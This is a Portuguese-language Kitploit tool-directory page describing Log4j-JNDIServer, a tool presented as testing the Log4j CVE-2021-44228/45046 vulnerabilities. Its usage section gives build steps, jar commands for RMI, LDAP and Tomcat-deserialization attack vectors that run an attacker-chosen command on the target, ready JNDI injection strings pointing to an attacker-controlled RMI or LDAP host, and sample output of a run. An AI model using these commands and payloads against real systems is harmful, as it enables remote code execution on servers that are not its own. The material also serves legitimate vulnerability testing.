Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Log4j-JNDIServer — Este projeto ajudará a testar a vulnerabilidade Log4j CVE-2021-44228. | Kitploit
Ferramentas/GitHubGitHub/immunityinc/log4j-jndiserver
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso Remoto
GitHubimmunityinc/log4j-jndiserver

Log4j-JNDIServer

Este projeto ajudará a testar a vulnerabilidade Log4j CVE-2021-44228.

Ver Repositório
924há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Log4j-JNDIServer

Este projeto ajudará a testar as vulnerabilidades Log4j CVE-2021-44228/CVE-2021-45046.

Instalação e Compilação

  • Carregue o projeto no Intellij Idea
  • Selecione o JDK em "Projects Settings" (CTRL + ALT + SHIFT + S)
  • Em "Project Settings", crie o Artifact -> "Artifacts" -> "Create JAR from Modules" -> Em "JAR files from libraries", marque "extract to target JAR" -> "OK"
  • Compile o Projeto (CTRL + F9). Isso criará o arquivo jar na pasta /out/artifacts/

Compilando com Maven

Requer Java 1.8+ e Maven 3.x+

  • mvn clean package -DskipTests
  • Você encontrará o arquivo .jar na pasta /target

Usos

1.Vetor de Ataque RMI

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>

Você não precisa mais hospedar o Exploit.class. O aplicativo iniciará um servidor HTTP na porta indicada.

Você deve indicar o comando que deseja executar no alvo.

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

2.Vetor de Ataque LDAP

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>

Você não precisa mais hospedar o Exploit.class. O aplicativo iniciará um servidor HTTP na porta indicada.

Você deve indicar o comando que deseja executar no alvo.

Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}

3.Vetor de Ataque de Desserialização (usando payload do Tomcat)

java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>

Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}

Exemplo

root@kitploit:~
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat  -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -
Baixar ferramenta